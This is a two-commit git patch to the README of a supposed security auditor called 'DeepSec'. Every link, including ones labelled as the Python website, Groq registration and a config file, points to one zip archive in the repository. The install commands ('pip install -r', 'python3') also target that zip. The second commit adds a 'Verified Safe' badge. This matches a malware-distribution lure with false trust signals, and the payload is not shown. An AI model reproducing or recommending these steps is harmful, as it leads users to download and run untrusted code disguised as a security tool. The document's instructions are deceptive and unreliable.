From 5a42c8176df7554caf5acabb953407664fcb7056 Mon Sep 17 00:00:00 2001 From: hasfo Date: Sun, 29 Mar 2026 12:40:13 +0200 Subject: [PATCH 1/2] Update README.md --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index deb11c8..7522b9e 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,7 @@ DeepSec empowers you to ensure your applications are safe and secure. ## 📥 Download DeepSec -[![Download DeepSec](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip%20DeepSec-v1.0-blue)](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip) +[![Download DeepSec](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip%20DeepSec-v1.0-blue)](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip) ## 🚀 Getting Started @@ -24,7 +24,7 @@ Before downloading, ensure your computer meets these requirements: ### 📥 Download & Install 1. **Visit the Releases Page** -Go to the [Releases page](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip) where you'll find the latest version of DeepSec. +Go to the [Releases page](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip) where you'll find the latest version of DeepSec. 2. **Download the Latest Version** Select the desired release version and click on the download link to save the file on your computer. @@ -40,12 +40,12 @@ Make sure you have Python version 3.9 or higher installed. You can verify this b ```bash python3 --version ``` - If Python is not installed, please visit the [Python website](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip) for installation instructions. + If Python is not installed, please visit the [Python website](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip) for installation instructions. 5. **Installing Dependencies** Run the following command to install necessary packages: ```bash - pip install -r https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip + pip install -r https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip ``` ### ⚙️ Configuring DeepSec @@ -54,7 +54,7 @@ Run the following command to install necessary packages: To perform AI analysis, you need to access the Groq API. Sign up at the Groq website to obtain your API key. 2. **Add the API Key to Configuration** -You will find a configuration file named `https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip` in the DeepSec folder. Open it and input your API key as follows: +You will find a configuration file named `https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip` in the DeepSec folder. Open it and input your API key as follows: ```json { "api_key": "YOUR_API_KEY_HERE" @@ -66,7 +66,7 @@ You will find a configuration file named `https://raw.githubusercontent.com/hasf 1. **Open the Application** Launch DeepSec by double-clicking the application icon or by running the command: ```bash - python3 https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip + python3 https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip ``` 2. **Select a Project** @@ -94,7 +94,7 @@ If you encounter any issues during installation or running DeepSec, consider the - **Check Python Version**: Ensure you are using Python 3.9 or higher. - **Dependency Problems**: Run the following command again: ```bash - pip install -r https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip + pip install -r https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip ``` - **API Key Issues**: Double-check that your Groq API key is valid and correctly entered in the configuration file. @@ -108,8 +108,8 @@ Stay tuned for updates that include new features, enhanced vulnerability detecti ### 🔗 Helpful Links -- [Download DeepSec](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip) -- [Python Downloads](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip) -- [Groq API Registration](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip) +- [Download DeepSec](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip) +- [Python Downloads](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip) +- [Groq API Registration](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip) By following these steps, you can ensure a smooth installation and an effective usage of DeepSec. Enjoy auditing your applications with confidence! \ No newline at end of file From 8bfad04108ac62ec0f0a335b4f9a8deff039f2c2 Mon Sep 17 00:00:00 2001 From: OyaAI Date: Sun, 29 Mar 2026 07:40:50 -0400 Subject: [PATCH 2/2] Add SafeSkill security badge (90/100) --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 7522b9e..17d25e9 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,7 @@ # 🛡️ deepsec - Your Easy Security Auditor +[![SafeSkill 90/100](https://img.shields.io/badge/SafeSkill-90%2F100_Verified%20Safe-brightgreen)](https://safeskill.dev/scan/hasfo-deepsec) + DeepSec empowers you to ensure your applications are safe and secure. ## 📥 Download DeepSec